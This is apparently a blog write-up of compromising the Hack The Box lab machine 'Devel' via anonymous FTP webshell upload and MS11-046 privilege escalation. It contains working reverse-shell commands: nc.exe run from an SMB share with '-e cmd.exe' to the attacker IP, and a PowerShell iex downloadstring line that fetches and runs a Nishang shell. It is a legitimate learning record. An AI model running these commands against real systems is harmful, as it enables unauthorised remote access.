Following on from Blue in number of pwns is Devel. I’m going in blind.
Just FTP and HTTP on this one. The detail scan says anonymous FTP is allowed and the webserver is Microsoft IIS httpd 7.5.
We can login to FTP and put files. I’m far - far - from expert at Windows, but I copy the included aspx webshell from the default Kali installation and upload it. With this I can run commands in the browser; but I’m a low privileged user:
I upload winpeas.bat but I’m not entirely sure where to go next. I go get the Windows Exploit Suggester - Next Generation and clone it and run it against the output of systeminfo on the box. Which shows, amongst other things:
OS Name: Microsoft Windows 7 Enterprise
OS Version: 6.1.7600 N/A Build 7600
The WES script says:
Installed hotfixes: None
And it comes up with 236 potential vulnerabilities. Wew lad.
Even though there are apparently myriad opportunities for moving forward, it’s not clear to me what the best thing to do is. I consult a thorough writeup from 0xdf.
0xdf shows a method for copying files to the Windows host using netcat. It’s not entirely necessary in this case since we can just use the FTP upload but it’s good practice. We use a python SMB server:
python3 /usr/share/doc/python3-impacket/examples/smbserver.py share smb
We need the compiled nc binary to copy to the box:
cp /usr/share/windows-resources/binaries/nc.exe .
We need a listener:
nc -lnvp 443
And we send this to the webshell:
\\10.10.14.2\share\nc.exe -e cmd.exe 10.10.14.2 443
And … nothing. Actually that’s not true; I can see it is transferring the file over the SMB server but it’s not triggering the reverse shell.
I check some other resources, kill my sambaserver and try again:
python3 /usr/share/doc/python3-impacket/examples/smbserver.py ROPNOP ./
Now I can run this on the webshell:
And I can see my files. Let’s try this on the webshell:
\\10.10.14.2\ROPNOP\nc.exe -e cmd.exe 10.10.14.2 443
Executing files from SMB. Because of the way Windows treats UNC paths, it’s possible to just execute our binary directly from the SMB share without even needing to copy it over first. Just run the executable as if it were already local and the payload will fire.
Alternative via Nishang
0xdf recommends Nishang. I clone the repo to /opt/nishang. We copy one of the shells to our local directory:
cp /opt/nishang/Shells/Invoke-PowerShellTcp.ps1 .
We have to edit the file, by copying the example line from it to the bottom of the script and editing the host and port:
Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.2 -Port 443
So the shell definition is in the body of the script, and the call is the line we added. Next, we kill our nc shell (we don’t actually use it) and restart the listener, start a python server and send this call to the webshell:
powershell iex(new-object net.webclient).downloadstring('http://10.10.14.2/Invoke-PowerShellTcp.p
We’ll see these things:
Okay, now we have a powershell reverse shell instead.
0xdf also shows a meterpreter reverse shell but I’ll ignore that for now.
0xdf runs a different vulnerability scanner called Watson, which shows some potential privesc methods. I’m not sure how he chose which one to use, but it’s MS11-046 using a precompiled binary from here.
I copy it over like he does, and try to run it with the nc shell (powershell version won’t run it apparently) and it … doesn’t work. I get this message:
Program too big to fit in memory
Googling this error message mostly shows people rebooting or whatever; I won’t be doing that. Now what?
There is source code for an exploit for MS11-046 in searchsploit. We need to mirror it and compile it, but first we need to install mingw-w64. Here’s an excerpt from my history showing the relevant commands:
And it’s bing, bang, rama-a-lama ding dong!
Next is OpenAdmin, but I’ve already done that one when it was live. I’ll move onto Netmon, which I’ve never done.